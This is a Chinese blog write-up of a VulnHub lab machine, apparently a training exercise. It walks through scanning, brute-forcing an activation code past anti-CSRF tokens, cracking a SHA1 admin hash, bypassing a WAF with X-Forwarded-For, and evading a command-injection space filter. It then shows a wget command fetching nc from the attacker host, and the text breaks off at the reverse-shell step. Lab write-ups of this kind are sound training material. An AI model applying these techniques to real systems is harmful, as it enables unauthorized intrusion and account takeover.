首页 > 其他分享 >第二十二次打靶

第二十二次打靶

时间:2023-11-06 23:33:05浏览次数:42  
标签:发现 打靶 第二十二次 token 靶机 数据包 页面

靶机介绍

1)靶机地址:https://download.vulnhub.com/geminiinc/Gemini-Pentest-v2.zip

2)靶机难度:中

3)打靶目标: 取得 root 权限 + 2Flag

4)涉及攻击方法:主机发现、端口扫描、信息收集、隐藏路径爬取、开放注册、验证码爆破、Anti CSRF Token、密码破解、WAF Bypass、命令注入绕过、SSH公钥认证、Redis漏洞利用、本地提权

5)靶机简介:本周的打靶过程可谓一波五折,每个攻击的环节都有障碍需要绕过,非常接近真实场景。首先需要爆破验证码,但是却发现有Anti CSRF Token捣乱,必须精细处理才能进入后台。接下来要足够细心,通过信息收集发现管理员帐号密码的密文,然后爆破出应用管理员密码。如果你以为有了管理员密码就可以顺利突破边界,那么不好意思,这里还有WAF需要绕过,否则连后台页面都看不到。利用自动实现WAF绕过的BP插件。终于见到了管理后台的功能页面,原以为是个简单的命令执行,结果却发现这里还有黑名单过滤。无奈再次想办法绕过,这才终于突破了边界,拿到低权限帐号。好在接下来的提权过程还算规范,我们将利用Redis权限配置漏洞,最终拿到Root权限和Flag。

6)注释:需要将本次靶机下载后,导入到vmwar workstation运行虚拟机

打靶过程

1)主机发现

# arp-scan -l
# arp-scan --interface eth1 172.24.10.0/24

2)全端口扫描

# nmap -p- 172.24.10.135

3)服务版本扫描、操作系统版本扫描

# nmap -p22,80 -A 172.24.10.135

4)web页面信息搜集:查看源代码,发现每次刷新页面都会生成一个token值,且使用上次打靶信息搜集得到的默认用户名admin和密码1234无法登录成功

5)对web系统进行路径爬取

# dirb http://172.24.10.135/ -r

依次点击上述扫描到的目录,均未发现有用信息。可猜测网站是用PHP开发,数据库为mysql

6)对以php后缀文件进行爬取

# dirb http://172.24.10.135/ -r -X .php

①通过上述搜索发现了一个激活页面activate.php:通过SQL注入无法成功注入

②注册页面:可以进行账号注册

③点击注册按钮后,会返回如下信息:即显示注册失败

④再次输入用户名、密码、邮箱进行注册时,会返回邮箱已经被用,说明注册信息有效

⑤通过注册的用户名和密码进行登录:登录成功后,显示账号未正常激活。结合activate.php,说明此处需要激活

⑥账号激活,根据activate.php的表单信息,需要输入用户id和6位数字的激活码:点击当前用户的my profile可查看到用户ID

7)通过burp的intruder模块进行包破解

①抓取数据包:在数据包中有一个token字段,每次activate.php页面进行不同数据的提交,touken值都不一样。说明服务端使用了安全CSRF的方法。所以要想进行数据爆破,则每次数据提交时的token都应该有所不同

②通过在HTTP history中查找发现,每次进行数据提交时,都会包含一个token,同时本次服务器的数据响应中,也会包含一个token。下次客户端请求数据包中的token数据,就是上次服务器响应数据包中返回的token

③将数据包发送至inturder模式,选择注入点位激活码和token.同时选择攻击类型为Pitchfork(即第一个字典的第n个数值和第二个字典的第n个数值一一匹配,每次成对提交两个数据字典中的内容)

④选择第一个payload类型为number,且范围为000000-999999,数字长度为6位

⑤从当前页面,提取token值,作为第二个字典的数据。在Options选项中定义提取token值的位置:先在Grep-Extract中点击add,然后refetch response获取到当前请求数据的响应数据包,在响应数据包中选中token。选中后,burp就会自动选择token字段的的前后位置字符进行匹配。

⑥选择第二个payload类型为Recursive grep,在payload options选项中选择上一步添加的token匹配规则

⑦选择数据线程为1

⑧发现当激活码为000511时,返回状态码返回了状态码为302

⑨此时返回web页面,可发现User list中已经显示了相关信息

8)登录后台,通过修改当前用户得配置,检测是否还存在XSS漏洞,发现输入得js代码原样得输出到了页面上,而没有显示弹出,说明xss漏洞已修复

<script>alert(123)</script>

9)通过查看该系统的其他用户信息,发现用户Gemini的Rank是Administrator,其他用户的Rank是Member

①同时查看当前用户信息页面的源代码,发现存在一行password字段,根据字段字符类型,可初步判断是sha1算法进行加密

②为了验证,该加密算法类型,返回到自己创建的admin用户的用户信息页面,也发现了一段加密的password字符

③通过测试发现,注册账号时使用的密码1234通过sha1加密算法加密后的密文就是上述字符,所以可以得出结论,该密码是通过sha1算法加密

# echo -n  "1234"|sha1sum

⑤解出管理员账号Gemini对应的password字段的明文为:secretpassword

链接:https://md5hashing.net/hash/sha1

10)通过管理员账号Gemini和密码secretpassword登录后台:登陆后发现了两个功能选项,但是点击时却无法正常访问

①通过burp抓取,点击General Settings功能时的请求,发现返回的状态码为403,提示IP NOT ALLOWED,猜测请求可能被拦截

②安装Bupass WAF插件

③勾选,启动bupass waf插件,默认配置不需要修改

④在Project options-->Session-->session Handling Rules中添加一个规则:所有基于burp发出的请求中,都会被自动插入x-forwarded-for类似的字段

⑤并且在Scope中,选择所有的范围

⑥在Target选项中,对当前靶机的地址添加scope

⑦完成上述操作后,当前目标靶机的url地址就会被自动加入到scope中

11)之后通过点击web系统的功能,就不再被拦截,而是成功返回

在Generate Setting并发现任何有价值信息

12)查看Execute Command选项,输入命令后,发现可以正常执行命令,但是没有任何的回显

13)当输入ls -l命令时发现出错了,命令没有正常执行

检查发现,对输入的字符进行了过滤,输入空格后会进行过滤,抓包后,将空格通过%09进行替换,转发数据包后,成功支持(%09就tab输入的字符)。说明此处空格字符被过滤

14)反弹shell

①kali主机通过python3模块,启动http服务

# which nc
# cd /usr/bin/
# python3 -m http.server 80

②在web系统执行命令,下载nc命令至目标靶机

wget http://172.24.10.131/nc -O /tmp/nc

②执行反弹shell

标签:发现,打靶,第二十二次,token,靶机,数据包,页面
From: https://www.cnblogs.com/piaolaipiaoqu/p/17814054.html

相关文章

  • 打靶思路
    主要流程信息收集:·途径:IP、端口、目录、网站开发语言、whois、邮箱、子域名等·思路:首先嗅探目标主机,工具:arping、fping、nmap已知IP:可以用工具扫描端口  工具:nmap、masscan、已知端口:(公认端口:0-1023,注册端口:1024-49151,动态/私有:49152-65535)一、文件共享服务端口渗透......
  • Metasploitable3打靶
    metasploitable3一、环境搭建介绍该靶场与2不同,可自定义镜像操作系统,由于版权等原因,该靶场最好使用virtualbox搭建,使用VMware搭建可能会有无法连接网络等问题。考虑需要培养线下无联网实战能力的原因,本次原则上只用kali里自带的工具,下次再推一些好用的工具。本靶机可能内......
  • 第十九次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/pyexp/pyexpvm.zip2)靶机难度:中3)打靶目标:取得root权限+2Flag4)涉及攻击方法:主机发现、端口扫描、信息收集、SSH......
  • 第十七次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/ripper/Ripper.ova2)靶机难度:低→中3)打靶目标:取得root权限+2Flag4)涉及攻击方法:主机发现、端口扫描、WEB信息搜......
  • 第十六次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/harrypotter/Nagini.ova2)靶机难度:中→高(打点较难)3)打靶目标:取得root权限+3Flag4)涉及攻击方法:主机发现、端口扫......
  • 第十五次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/doubletrouble/doubletrouble.ova2)靶机难度:中3)打靶目标:取得两台靶机root权限+Flag4)涉及攻击方法:主机发现、端......
  • 第十二次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip2)靶机难度:中3)打靶目标:取得root权限+Flag4)涉及攻击方法:主机发现、端口扫描、WEB......
  • 第十二次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/vikings/Vikings.ova2)靶机难度:低(中)3)打靶目标:取得root权限+2Flag4)涉及攻击方法:主机发现、端口扫描、WEB信息收......
  • 第十次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova2)靶机难度:中3)打靶目标:取得root权限4)涉及攻击方法:主机发现、端口扫描、WEB信息......
  • 第九次打靶
    靶机介绍1)靶机地址:https://download.vulnhub.com/evilbox/EvilBox---One.ova2)靶机难度:低→中3)打靶目标:取得root权限+2Flag4)涉及攻击方法:主机发现、网络扫描、......